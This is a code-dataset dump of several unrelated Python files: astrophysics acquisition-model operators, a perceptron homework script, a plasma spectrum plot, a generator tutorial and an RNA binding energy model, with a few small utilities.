ResponseTruncatedExponential(AcquisitionModelLinear, Square):\n \"\"\"\n ResponseTruncatedExponential(tau)\n\n Apply a truncated exponential response to the signal\n\n Parameters\n ==========\n \n tau: number\n Time constant divided by the signal sampling period\n \"\"\"\n \n def __init__(self, tau, **keywords):\n \"\"\"\n \"\"\"\n AcquisitionModelLinear.__init__(self, typein=Tod, **keywords)\n Square.__init__(self, **keywords)\n if hasattr(tau, 'SI'):\n tau = tau.SI\n if tau.unit != '':\n raise ValueError('The time constant must be dimensionless.')\n self.tau = np.array(tau, dtype=var.FLOAT_DTYPE, ndmin=1)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n tmf.convolution_trexp_direct(output.T, np.array(output.nsamples),\n self.tau)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n tmf.convolution_trexp_transpose(output.T, np.array(output.nsamples),\n self.tau)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Padding(AcquisitionModelLinear):\n \"Pads before and after a Tod.\"\n\n def __init__(self, left=0, right=0, value=0., shapein=None, **keywords):\n if shapein is not None:\n shapeout = self.validate_shapein(shapein)\n 
else:\n shapeout = None\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=shapein,\n shapeout=shapeout,\n typein=Tod,\n **keywords)\n left = np.array(left, ndmin=1, dtype=int)\n right = np.array(right, ndmin=1, dtype=int)\n if np.any(left < 0):\n raise ValueError('Left padding is not positive.')\n if np.any(right < 0):\n raise ValueError('Right padding is not positive.')\n if np.rank(left) != 1 or np.rank(right) != 1:\n raise ValueError('Padding must be scalar or a vector.')\n self.left = tuple(left)\n self.right = tuple(right)\n self.value = value\n \n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n dest = 0\n dest_padded = 0\n for islice in range(len(input.nsamples)):\n nsamples = input.nsamples[islice]\n left = self.left[islice if len(self.left) > 1 else 0]\n output[...,dest_padded:dest_padded+left] = self.value\n output[...,dest_padded+left:dest_padded+left+nsamples] = \\\n input[...,dest:dest+nsamples]\n output[...,dest_padded+left+nsamples:dest_padded+ \\\n output.nsamples[islice]] = self.value\n dest += nsamples\n dest_padded += output.nsamples[islice]\n return output\n \n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n dest = 0\n dest_padded = 0\n for islice in range(len(input.nsamples)):\n nsamples = output.nsamples[islice]\n left = self.left [islice if len(self.left) > 1 else 0]\n output[...,dest:dest+nsamples] = \\\n input[...,dest_padded+left:dest_padded+left+nsamples]\n dest += nsamples\n dest_padded += input.nsamples[islice]\n return output\n\n def validate_input_direct(self, input, cachein, cacheout):\n input, output = super(Padding, self).validate_input_direct(input,\n cachein, cacheout)\n if len(self.left) != 1 and len(self.left) != len(input.nsamples):\n raise ValueError(\"The input Tod has a number of slices '\" + \\\n str(len(input.nsamples)) + \\\n \"' incompatible with the specified padding.\")\n return input, output\n \n def validate_input_transpose(self, input, cachein, cacheout):\n input, output = super(Padding, self).validate_input_transpose(input,\n cachein, cacheout)\n if len(self.left) != 1 and len(self.left) != len(input.nsamples):\n raise ValueError(\"The input Tod has a number of slices '\" + \\\n str(len(input.nsamples)) +\n \"' incompatible with the specified padding.\")\n return input, output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return None\n return combine_sliced_shape(shapein[0:-1], np.array(shapein[-1]) + \\\n self.left + self.right)\n \n def validate_shapeout(self, shapeout):\n if shapeout is None:\n return None\n return combine_sliced_shape(shapeout[0:-1], np.array(shapeout[-1]) -\\\n self.left - self.right)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Shift(AcquisitionModelLinear, Square):\n\n def __init__(self, n, axis=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n if axis is None:\n if not isinstance(n, (list, tuple, np.ndarray)):\n n = (n,)\n axis = tuple(np.arange(-len(n), 0))\n elif not isinstance(axis, (list, tuple, np.ndarray)):\n n = (n,)\n axis = (axis,)\n elif not isinstance(n, (list, tuple, np.ndarray)) or \\\n len(n) != len(axis):\n n = len(axis) * (n,)\n self.n = [np.array(v, dtype=int) for v in n]\n self.axis = [int(v) for v in axis]\n\n def direct(self, input, inplace, cachein, cacheout):\n output = 
self.validate_input_inplace(input, inplace)\n for n, axis in zip(self.n, self.axis):\n shift(output, n, axis)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for n, axis in zip(self.n, self.axis):\n shift(output, -n, axis)\n return output \n\n\n#-------------------------------------------------------------------------------\n\n\nclass CircularShift(AcquisitionModelLinear, Square):\n \n def __init__(self, n, axis=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n if _my_isscalar(n):\n n = (n,)\n if axis is None:\n axis = tuple(np.arange(-len(n), 0))\n elif _my_isscalar(axis):\n axis = (axis,)\n self.n = tuple(map(int, n))\n self.axis = tuple(map(int, axis))\n\n def direct(self, input, inplace, cachein, cacheout):\n for axis, n in zip(self.axis, self.n):\n input = np.roll(input, -n, axis=axis)\n return input\n\n def transpose(self, input, inplace, cachein, cacheout):\n for axis, n in zip(self.axis, self.n):\n input = np.roll(input, n, axis=axis)\n return input\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Fft(AcquisitionModelLinear, Square):\n \"\"\"\n Performs complex fft\n \"\"\"\n\n def __init__(self, shape, flags=['estimate'], **keywords):\n AcquisitionModelLinear.__init__(self, shapein=shape,\n dtype=var.COMPLEX_DTYPE, **keywords)\n Square.__init__(self, **keywords)\n if fftw3.planning.lib_threads is None:\n nthreads = 1\n else:\n nthreads = tmf.info_nthreads()\n self.n = np.product(shape)\n self._in = np.zeros(shape, dtype=var.COMPLEX_DTYPE)\n self._out = np.zeros(shape, dtype=var.COMPLEX_DTYPE)\n self.forward_plan = fftw3.Plan(self._in, self._out, direction='forward',\n flags=flags, nthreads=nthreads)\n self.backward_plan= fftw3.Plan(self._in, self._out,direction='backward',\n flags=flags, nthreads=nthreads)\n\n def direct(self, input, inplace, cachein, cacheout):\n self._in[:] = input\n fftw3.execute(self.forward_plan)\n return Map(self._out)\n\n def transpose(self, input, inplace, cachein, cacheout):\n self._in[:] = input\n fftw3.execute(self.backward_plan)\n return Map(self._out / self.n, copy=False)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass FftHalfComplex(AcquisitionModelLinear, Square):\n \"\"\"\n Performs real-to-half-complex fft\n \"\"\"\n\n def __init__(self, nsamples, **keywords):\n AcquisitionModelLinear.__init__(self, typein=Tod, **keywords)\n Square.__init__(self, **keywords)\n self.nsamples = tuple(np.array(nsamples, ndmin=1, dtype=int))\n self.forward_plan = np.empty(len(self.nsamples), dtype=int)\n self.backward_plan = np.empty(len(self.nsamples), dtype=int)\n for i, n in enumerate(self.nsamples):\n tarray = np.empty(n, dtype=var.FLOAT_DTYPE)\n farray = np.empty(n, dtype=var.FLOAT_DTYPE)\n self.forward_plan[i] = \\\n fftw3.Plan(tarray, farray, direction='forward',\n flags=['measure'], realtypes=['halfcomplex r2c'],\n nthreads=1)._get_parameter()\n self.backward_plan[i] = \\\n fftw3.Plan(farray, tarray, direction='backward',\n flags=['measure'], realtypes=['halfcomplex c2r'],\n nthreads=1)._get_parameter()\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output_ = _smart_reshape(output, (np.product(input.shape[:-1]),\n input.shape[-1]))\n tmf.fft_plan(output_.T, np.array(self.nsamples), self.forward_plan)\n return output\n\n def transpose(self, input, inplace, 
cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output_ = _smart_reshape(output, (np.product(input.shape[:-1]), \n input.shape[-1]))\n tmf.fft_plan(output_.T, np.array(self.nsamples), self.backward_plan)\n dest = 0\n for n in self.nsamples:\n output_[:,dest:dest+n] /= n\n dest += n\n return output\n\n def validate_shapein(self, shape):\n if shape is None:\n return None\n nsamples = shape[-1]\n if nsamples != self.nsamples and nsamples != sum(self.nsamples):\n raise ValidationError(\"Invalid FFT size '\" + str(nsamples) + \\\n \"' instead of '\"+str(self.nsamples)+\"'.\")\n return combine_sliced_shape(shape[0:-1], self.nsamples)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Convolution(Symmetric):\n\n def __init__(self, kernel, **keywords):\n Symmetric.__init__(self, **keywords)\n self.kernel = np.asanyarray(kernel)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output[:] = scipy.signal.fftconvolve(input, self.kernel, mode='same')\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass InvNtt(AcquisitionModelLinear):\n\n def __init__(self, obs, filename=None, **keywords):\n nsamples = obs.get_nsamples()\n length = np.asarray(2**np.ceil(np.log2(np.array(nsamples) + 200)), int)\n invntt = self._get_diagonal(length, obs.get_filter_uncorrelated(\n filename=filename, **keywords))\n fft = FftHalfComplex(length)\n padding = Padding(left=invntt.ncorrelations, right=length - nsamples - \\\n invntt.ncorrelations)\n _tocompositemodel(self, Composition,\n [ padding.T, fft.T, invntt, fft, padding ])\n\n def _get_diagonal(self, nsamples, filter, **keywords):\n nsamples = np.asarray(nsamples)\n ndetectors = filter.shape[-2]\n ncorrelations = filter.shape[-1] - 1\n nslices = nsamples.size\n if np.rank(filter) == 2:\n filter = np.resize(filter,(nslices, ndetectors, ncorrelations+1))\n tod_filter, status = \\\n tmf.fft_filter_uncorrelated(filter.T, np.asarray(nsamples, \n dtype=np.int32), np.sum(nsamples))\n if status != 0: raise RuntimeError()\n d = Diagonal(tod_filter.T, shapein=tod_filter.T.shape, **keywords)\n d = np.maximum(d, 0)\n d.data /= var.comm_tod.allreduce(np.max(d.data), op=MPI.MAX)\n d.ncorrelations = ncorrelations\n return d\n\n\n#-------------------------------------------------------------------------------\n\n\nclass SqrtInvNtt(InvNtt):\n def __init__(self, *args, **kw):\n invntt = InvNtt(*args, **kw)\n _tocompositemodel(self, Composition, invntt.blocks)\n data = self.blocks[2].data\n data[:] = np.sqrt(data)\n #np.sqrt(data, out=data) does not work with numpy 1.5\n\n\n#-------------------------------------------------------------------------------\n\n\nclass InterpolationLinear(AcquisitionModelLinear, Square):\n\n def __init__(self, mask, **keywords):\n AcquisitionModelLinear.__init__(self, attrin={'mask':mask}, **keywords)\n Square.__init__(self, **keywords)\n self.mask = mask\n\n def direct(self, input, inplace, cachein, cacheout):\n return interpolate_linear(output)\n\n def transpose(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n\n#-------------------------------------------------------------------------------\n\n\ndef acquisitionmodel_factory(direct, transpose=None, description=None, **keywords):\n \"\"\"Creates an AcquisitionModel from a function\"\"\"\n description = description or direct.__name__\n if description == '':\n description = ''\n\n if 
transpose is None:\n a = AcquisitionModel(description=description, **keywords)\n else:\n a = AcquisitionModelLinear(description=description, **keywords)\n\n def d(input, inplace, cachein, cacheout):\n output = a.validate_input_inplace(input, inplace)\n return direct(output)\n a.direct = d\n if transpose is None:\n return a\n\n def t(input, inplace, cachein, cacheout):\n output = a.validate_input_inplace(input, inplace)\n return transpose(output)\n a.transpose = t\n return a\n\ndef Clip(vmin, vmax, description=None, **keywords):\n description = description or 'Clip'\n return acquisitionmodel_factory(lambda x: np.clip(x, vmin, vmax, out=x),\n description=description, **keywords)\n\ndef Maximum(value, description=None, **keywords):\n description = description or 'Maximum'\n return acquisitionmodel_factory(lambda x: np.maximum(x, value, x),\n description=description, **keywords)\n\ndef Minimum(value, description=None, **keywords):\n description = description or 'Minimum'\n return acquisitionmodel_factory(lambda x: np.minimum(x, value, x),\n description=description, **keywords)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef asacquisitionmodel(operator, shapein=None, shapeout=None, description=None):\n if isinstance(operator, AcquisitionModel):\n if shapein and operator.shapein and shapein != operator.shapein:\n raise ValueError('The input shapein ' + str(shapein) + ' is incom' \\\n 'patible with that of the input ' + str(operator.shapein) + '.')\n if shapeout and operator.shapeout and shapeout != operator.shapeout:\n raise ValueError('The input shapeout ' + str(shapeout) + ' is inco'\\\n 'mpatible with that of the input ' + str(operator.shapeout) + \\\n '.')\n if shapein and not operator.shapein or \\\n shapeout and not operator.shapeout:\n operator = copy.copy(operator)\n operator.shapein = shapein\n operator.shapeout = shapeout\n return operator\n if _my_isscalar(operator):\n return Scalar(operator)\n if isinstance(operator, LinearOperator):\n direct = lambda input, inplace, cachein, cacheout: \\\n operator.matvec(input)\n transpose = lambda input, inplace, cachein, cacheout: \\\n operator.rmatvec(input)\n model = AcquisitionModelLinear(direct=direct,\n transpose=transpose,\n shapein=shapein or operator.shape[1],\n shapeout=shapeout or operator.shape[0],\n dtype=operator.dtype,\n description=description)\n return model\n return asacquisitionmodel(scipy.sparse.linalg.aslinearoperator(operator),\n description=description)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _tocompositemodel(model, cls, models):\n if model.__class__ == cls:\n return model\n model.__class__ = cls\n model.__init__(models)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _get_dtype(type1, type2):\n t1 = type1.type()\n t2 = type2.type()\n t = t1 * t2\n return t.dtype\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _is_scientific_dtype(dtype):\n \"\"\"Return true if the data type is \"\"\"\n return issubclass(dtype.type, np.number) or dtype.type == np.bool8\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _propagate_attributes(input, output, unitin, unitout, attrout):\n \"\"\"Copy over attributes from input to output\"\"\"\n\n # if the arguments do not have the same shape, only copy the units\n if input.shape != output.shape:\n try:\n setattr(output, '_unit', input._unit)\n except:\n pass\n 
try:\n setattr(output, '_derived_units', input._derived_units)\n except:\n pass\n\n elif hasattr(input, '__dict__'):\n\n # copy over input's attributes\n for k, v in input.__dict__.items():\n setattr(output, k, v)\n\n _validate_output_unit(input, output, unitin, unitout)\n\n # copy over operator's attributes\n for k,v in attrout.items():\n setattr(output, k, v)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _smart_reshape(input, shape):\n curr = input\n shape = flatten_sliced_shape(shape)\n while True:\n if curr.shape == shape:\n return curr\n base = curr.base\n if base is None or base.dtype != input.dtype or \\\n base.__class__ != input.__class__ or base.size != input.size:\n return curr.reshape(shape)\n curr = base\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _validate_input_unit(input, expected):\n if len(expected) == 0 or not hasattr(input, '_unit') or \\\n len(input._unit) == 0:\n return\n for u,v in expected.items():\n if u not in input._unit or input._unit[u] != v:\n unit = Quantity(1, expected).unit\n raise ValidationError(\"The input unit '\" + input.unit + \"' is inco\"\\\n \"mpatible with the required unit '\" + unit + \"'.\")\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _validate_output_unit(input, output, unitin, unitout):\n if not hasattr(output, '_unit'):\n return\n if len(unitout) == 0:\n return\n if len(output._unit) == 0:\n output._unit = unitout\n return\n output._unit = _divide_unit(output._unit, unitin)\n output._unit = _multiply_unit(output._unit, unitout)\n","sub_path":"core/src/acquisitionmodels.py","file_name":"acquisitionmodels.py","file_ext":"py","file_size_in_byte":74418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141389721","text":"from abc import ABCMeta\n\nfrom jsoncfg.value_mappers import require_string, require_integer\n\n\nclass PeekFileConfigPeekServerClientMixin(metaclass=ABCMeta):\n\n ### SERVER SECTION ###\n @property\n def peekServerPort(self):\n with self._cfg as c:\n return c.peekServer.port(8011, require_integer)\n\n\n @property\n def peekServerHost(self):\n with self._cfg as c:\n return c.peekServer.host('127.0.0.1', require_string)\n","sub_path":"peek_platform/file_config/PeekFileConfigPeekServerClientMixin.py","file_name":"PeekFileConfigPeekServerClientMixin.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44071728","text":"import numpy as np\n\nfrom BaseInputProcessor import BaseInputProcessor\nclass GaussianNoiseInputProcessor(BaseInputProcessor):\n def __init__(self, variable, uids, mean, std, start = -1, stop = -1):\n super(GaussianNoiseInputProcessor, self).__init__([(variable,uids)],\n mode=0)\n self.mean = mean\n self.std = std\n self.start = start\n self.stop = stop\n self.var = variable\n self.num = len(uids)\n\n def update_input(self):\n self.variables[self.var]['input'] = self.std*\\\n np.array(np.random.randn(self.num), dtype = self.dtypes[self.var]) + self.mean\n\n def is_input_available(self):\n if self.start>-1. 
and self.stop>self.start:\n return (self.LPU_obj.time >= self.start and\n self.LPU_obj.time < self.stop)\n else:\n return False\n\n def post_run(self):\n pass\n","sub_path":"neurokernel/LPU/InputProcessors/GaussianNoiseInputProcessor.py","file_name":"GaussianNoiseInputProcessor.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"596402071","text":"from svmutil import *\nimport numpy as np\nimport math\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass KernelizedPerceptron_binary():\n\n\tdef __init__(self, path1, path2):\n\n\t\tself.train_list_letter, self.train_list_word = self.parse(path1)\n\t\tself.test_list_letter, self.test_list_word = self.parse(path2)\n\n\n\t\tself.alpha = np.zeros(len(self.train_list_word), dtype = np.float32)\n\t\tself.bias = 0\n\t\tself.maxiter = 20\n\n\t\tself.mistakes_train = np.zeros(self.maxiter, dtype = np.int32)\n\t\tself.mistakes_test = np.zeros(self.maxiter, dtype = np.int32)\n\n\n\tdef parse(self, file):\n\n\t\t# list of the x's\n\t\tlist_word = []\n\t\t# list of the y's\n\t\tlist_letter = []\n\t\t#holds the whole list\n\t\t#list_main = []\n\n\t\tf = open(file)\t\t#code for parsing\n\n\t\tfor line in f:\n\t\t\t# to remove the blank lines\n\t\t\tif line.strip():\n\t\t\t\tg = line.split(\"\\t\")\n\t\t\t\t#convert each element in the list to a list\n\t\t\t\t#extract the label in each x\n\t\t\t\tletter = g[2]\n\t\t\t\t# map the letter to a number \n\t\t\t\t# a -> 1, b -> 2, c -> 3, ...\n\t\t\t\tletter = ord(letter) - 97\n\t\t\t\t#extract the x for each input data\n\t\t\t\tword = list(g[1][2:])\n\t\t\t\t#word = (map(float, word))\n\t\t\t\tword = [float(w) for w in word]\n\t\t\t\tif letter == 0 or letter == 4 or letter == 8 or letter == 14 or letter == 20:\n\t\t\t\t\tletter = 1\n\t\t\t\telse:\n\t\t\t\t\tletter = -1\n\t\t\t\t# print word\n\t\t\t\t# if validation set is being computed\n\t\t\t\tlist_word.append(word)\n\t\t\t\tlist_letter.append(letter)\n\t\t\t\t#list_main.append(g)\n\t\t\n\t\treturn np.array(list_letter, dtype=int), np.array(list_word, dtype=int) #, list_main\n\n\n\tdef classifier_train (self):\n\n\t\tfor iter in range (self.maxiter):\n\t\t\t# print (iter)\n\t\t\tmistake = 0\n\n\t\t\tfor i in range (len(self.train_list_word)):\n\t\t\t\t# now we have to compute the activation function\n\t\t\t\t# computation of activation function\n\t\t\t\ta = 0\n\t\t\t\tfor j in range (len (self.alpha)):\n\t\t\t\t\ta_ = np.dot(self.train_list_word[j], self.train_list_word[i]) + 1\n\n\t\t\t\t\ta__ = math.pow(a_, 2)\n\n\t\t\t\t\ta += self.alpha[j] * a__ + self.bias\n\n\n\t\t\t\t# condition for the mistake check\n\t\t\t\tif self.train_list_letter[i] * a <= 0:\n\t\t\t\t\t\n\t\t\t\t\tmistake += 1\n\t\t\t\t\t# update the alphas\n\t\t\t\t\tself.alpha[i] += self.train_list_letter[i]\n\t\t\t\t\t# update the bias\n\t\t\t\t\tself.bias += self.train_list_letter[i]\n\n\t\t\tself.mistakes_train[iter] = mistake\n\t\t\t# perform the testing after one iteration of training\n\t\t\tself.mistakes_test[iter] = self.classifier_test()\n\n\t\t\n\t\treturn self.alpha, self.bias\n\n\n\tdef classifier_test(self):\n\t\t# for testing set\n\t\tmistake = 0\n\t\t# print (\"testing\")\n\t\tfor i in range (len(self.test_list_word)):\n\n\t\t\ta =0\n\t\t\tfor j in range (len(self.alpha)):\n\t\t\t\n\t\t\t\ta_ = np.dot(self.train_list_word[j], self.test_list_word[i]) + 1\n\n\t\t\t\ta__ = math.pow(a_, 2)\n\n\t\t\t\ta += self.alpha[j] * a__ + self.bias\n\n\t\t\tif self.test_list_letter[i] * a <= 
0:\n\n\t\t\t\tmistake += 1\n\t\treturn mistake\n\n\t\t\t\n\n\ndef main():\n\tpath1 = \"/home/goelshivam12/Desktop/ML_Homework/HW#1/OCRdata/ocr_fold0_sm_train.txt\"\n\tpath2 = \"/home/goelshivam12/Desktop/ML_Homework/HW#1/OCRdata/ocr_fold0_sm_test.txt\"\n\n\tclassifier = KernelizedPerceptron_binary(path1, path2)\n\ta, b = classifier.classifier_train()\n\t# print a\n\tprint (classifier.mistakes_train)\n\tprint (classifier.mistakes_test)\n\tprint (len(classifier.train_list_word))\n\tprint (len(classifier.test_list_word))\n\n\tplt.plot(classifier.mistakes_train)\n\tplt.plot(classifier.mistakes_test)\n\tplt.show()\n\n\t# plots the testing accuracy of the dataset\n\t# plt.plot(accuracy_validation)\n\n\t# plt.xlabel(\"C's\", fontsize = 15)\n\t# plt.ylabel(\" Accuracy\", fontsize = 15)\n\t# plt.title(\"Accuracy Curve (SVM)\", fontsize = 25)\n\t# # plt.ylim([0.1, 0.8])\n\t# plt.grid(True)\n\t# plt.legend(['Training', ' Testing', 'Validation'])\n\t# plt.show() \n\n\n\nif __name__ == '__main__':\n\n\tmain()\n\n\n\t\t# compute the training classifier and each time please test its accuracy on the validation data as well as the test data \n\n\n\n\n","sub_path":"HW#2/code/11483916-GOEL/kernelizedperceptron_bin.py","file_name":"kernelizedperceptron_bin.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191719609","text":"#!/usr/bin/python\n\n# Python script to merge multiple def-files into single def-file\nimport os\nimport sys\n\nif (len(sys.argv) != 3 or sys.argv[1] == '-h'):\n print('Usage:')\n print(' merge_def_files.py merge_list.txt outfile.def')\n sys.exit()\n\ndefFileList = open(sys.argv[1], 'r')\ndefFile = defFileList.readlines()\ndefFilePath = []\nmergedDefFile = sys.argv[2]\n\nfor defFileName in defFile:\n defFilePath.append((defFileName).strip())\n\nwith open(mergedDefFile, 'w') as outFile:\n for defFileName in defFilePath:\n outFile.write('\\n\\n')\n with open(defFileName) as inFile:\n for line in inFile:\n outFile.write(line)\n","sub_path":"DEF-files/SHMS/PRODUCTION/merge_def_files.py","file_name":"merge_def_files.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316790989","text":"import kawa.spectrum as ksp\nimport kawa.daq as dq\nimport kawa.tools as kt\nimport kawa.myplot as my\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport pandas as pd\nimport os\nmy.defalt()\nfid = dq.pantaADC()\n# --- PATH TO REF AND DATA ---\nhome = os.environ[\"HOME\"]\nrefpath = home + \"/KYTHON/ref/\"\ndatapath = home + \"/mnt/\"\n\ndt = 1e-6\ndef read2d_64(shot,subno,kind = \"Iis\",edge1 = int( 0.24 /dt) ,edge2 = int( 0.54 /dt)):\n fid = dq.pantaADC()\n dagfile = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n dt = 1e-6\n count = -1\n if kind == \"Iis\":\n start = 0\n coef = 1\n elif kind == \"Vf\":\n start = 1\n coef = 20\n for i in range(start,64,2): #i == 0 => ch1 => Iis is odd num. 
\n count += 1\n if count == 0:\n signal,time = fid.read(shot = shot, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=True,\n start = edge1, end = edge2)\n signal = coef*signal\n ms = np.mean(signal)\n if kind == \"Vf\":\n signal = signal- ms\n elif kind == \"Iis\":\n signal = (signal-ms)/ms\n #signal = signal-np.mean(signal)\n\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n\n df = pd.DataFrame(signal)\n else:\n signal = fid.read(shot = shot, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=False,\n start = edge1, end = edge2)\n signal = coef*signal\n ms = np.mean(signal)\n if kind == \"Vf\":\n signal = ( signal- ms )\n elif kind == \"Iis\":\n signal = (signal-ms)/ms\n\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n df[count] = signal\n phase = np.linspace(0,1,32)\n return phase,time,df\nedge1 = int(0.24/dt)\nedge2 = int(0.54/dt)\n\nshot = \"105394\"\nsub = \"001\"\nphase,time,signals = read2d_64(shot,sub,edge1 = edge1,edge2 = edge2)\nf,m,spec1 = ksp.psd2d(signals,dt = dt,nfft = 1e4)\n\nfig = pl.figure()\nax = fig.add_subplot(111)\ntext = r\"$\\mathsf{ \\frac{\\~{I}_{is}}{ \\langle I_{is} \\rangle }} $\"\nmy.contourf_log(f/1000,m,spec1)\npl.xlim(0,20)\npl.ylim(-5,10)\npl.xlabel(\"Frequency (kHz)\")\npl.ylabel(\"Azimuthal mode number\")\ncbar = pl.colorbar()\ncbar.set_ticks([pow(10,i) for i in range(-12,-2)])\npl.text(0.9, 0.15,r\"$\\mathsf{ \\frac{\\~{I}_{is}}{ \\langle I_{is} \\rangle }} $\", ha='center', va='center', transform=ax.transAxes,\n fontsize = 20,color = \"k\",bbox = {\"facecolor\":\"w\",\"edgecolor\" :\"w\"})\npl.show()","sub_path":"paper/old/psd2d.py","file_name":"psd2d.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35399292","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2017/10/11 PM8:46\n# @Author : edison\n\n# yield 表达式\n\n# yield from 表达式\n# yeild from语法就是将生成器函数中包括yield语句的部分逻辑封装到一个子生成器函数中。\n# 然后在子生成器函数外面可以做一些其他的业务逻辑。整个生成器函数(包括子生成器函数)对外就是一个生成器函数。\n\n\ndef createGenerator(num):\n mylist = range(num)\n for i in mylist:\n yield i * i\n\n\nmygen = createGenerator(5) # mygen 是一个生成器表达式\n\nfor i in mygen:\n print(\"i is %s\" % i)\n\nmygen2 = createGenerator(2)\n\nprint(next(mygen2))\nprint(next(mygen2))\n\n# yield from sample\n\ndef B():\n i = 1\n while i < 5:\n n = yield i\n if i == 3:\n return 100\n i += 1\ndef A():\n val = yield from B()\n print('val is %s' % val)\n\nt = A()\nt.send(None) # means t.next()\n# next()和send()在一定意义上作用是相似的,区别是send()可以传递值给yield表达式,而next()不能传递特定的值,只能传递None进去。因此,我们可以看做\n# t.next() 和 t.send(None) 作用是一样的。\n\nj = 0\nwhile j < 3:\n j += 1\n try:\n t.send(j)\n except StopIteration as e:\n print(e)\n","sub_path":"asyc/lesson01.py","file_name":"lesson01.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244631393","text":"# Import modules\nimport scipy\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport ipdb\nimport itertools\n\nkb = 0.0019872041 # kcal/(mol deg K)\nkelvin = 273.15 # Kelvin at 0 deg C\n\ndef load_params(model_param_basename='annotations/RNAmap/qMotif_20180302_'):\n \"\"\"Load the 
model parameters based on the basename\"\"\"\n base_params = pd.read_csv(model_param_basename + 'term1.csv', index_col=0) #.stack().values\n flip_params = pd.read_csv(model_param_basename + 'term2_single.csv', index_col=0) #.stack().values\n dflip_params = pd.read_csv(model_param_basename + 'term2_double.csv', index_col=0, squeeze=True) #.stack().values, 10])\n coupling_params = pd.read_csv(model_param_basename + 'term3.csv', index_col=0, squeeze=True) #.stack().values\n \n return flip_params, base_params, coupling_params, dflip_params\n \n\ndef get_ddG_conversion(temperature):\n return -(temperature+kelvin)*kb\n\ndef perfect_match_ddG_coupling_terms(sequence, base_penalties, coupling_terms, first_coupling, second_coupling):\n # Inputs:\n # first_coupling--set to True if first (7G) coupling should be included if the conditions are met (this is included so that this can be set to false\n # when flips occur in the coupling region, which will likely prevent coupling)\n # second_coupling--set to True if second (7C) coupling should be included if the necessary conditions are met\n # base_penalties--base penalties in partition function space (exp(-ddG_base/kT))\n # coupling_terms--coupling penalties in partition function space (exp(-ddG_base/kT))\n # sequence register that the mutational penalty contribution is being computed for\n # Output: ddG transformed into partition function space for passed sequence\n\n # Initialize to a penalty of 0 kcal: \n ddG = 0\n # Iterate through base penalties\n for i, base in enumerate(sequence):\n if i==8 and sequence[7]!='A':\n # exception at position 8--nothing happens\n continue\n ddG = ddG + base_penalties.loc[i, base]\n\n # Apply coupling corrections\n if first_coupling:\n if ((sequence[4] == 'U' or sequence[4] == 'C') and\n sequence[5] == 'A' and\n sequence[6] == 'G' and\n sequence[7] != 'A'):\n ddG = ddG + coupling_terms.loc['c1']\n if second_coupling:\n if sequence[6] == 'C' and sequence[7] != 'A':\n ddG = ddG + coupling_terms.loc['c2']\n\n return ddG\n\ndef perfect_match_exp_ddG_coupling_terms(sequence, base_penalties_exp, coupling_terms_exp, first_coupling, second_coupling):\n # Inputs:\n # first_coupling--set to True if first (7G) coupling should be included if the conditions are met (this is included so that this can be set to false\n # when flips occur in the coupling region, which will likely prevent coupling)\n # second_coupling--set to True if second (7C) coupling should be included if the necessary conditions are met\n # 